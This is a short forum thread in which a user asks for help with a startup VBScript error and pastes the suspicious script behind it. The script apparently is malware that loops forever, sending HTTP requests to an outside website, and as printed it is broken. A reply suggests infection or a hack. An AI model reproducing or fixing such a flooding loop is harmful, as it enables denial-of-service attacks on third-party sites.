|
|
|||||||||
|
|||||||||
|
|||||||||
| |
||
| |||||||||
![]() |
|
|
«
Previous Thread
|
Next Thread
»
|
Thread Tools | Search this Thread | Rate Thread | Display Modes |
|
#1
|
|||
|
|||
|
When I turn my PC on I get the following message, and I cannot access any of my jpeg files.
Script c:\WIDOWS\SYSTEM\Explorer5.vbs Line 5 Char 22 Error Syntax Error Code 800A03EA Source Microsoft VBScript compilation error When I open this file c:\WIDOWS\SYSTEM\Explorer5.vbs I retrieve the following script On Error Resume Next set wsTCP=CreateObject("oswinsck.TCP") Head = "GET " & "http://www.nymex.com" & " HTTP/1.0" & vbCrLf & "Accept: */*" & vbCrLf & "User-Agent: " & "Mozilla/4.0 (compatible; MSIE 6.0; Win32)" & vbcrlf & "Host: 127.0.0.1" & vbCrLf & vbCrLf Do If wsTCP.Connect("", ) = 0 Then wsTCP.SendData Head wsTCP.Disconnect End If loop Can anyone help - Thanx |
|
#2
|
|||
|
|||
|
Since there is nothing asp about this question, I'm moving to the Windows OS forum.
I'd say you have a virus, spyware, or you've been hacked.
__________________
====== Doug G ====== I didn't attend the funeral, but I sent a nice letter saying I approved of it. --Mark Twain |
![]() |
| Viewing: ASP Free Forums > System Administration > Windows Scripting > VBScript compilation error 800A03EA |
| Thread Tools | Search this Thread |
| Display Modes | Rate This Thread |
|
|
|
|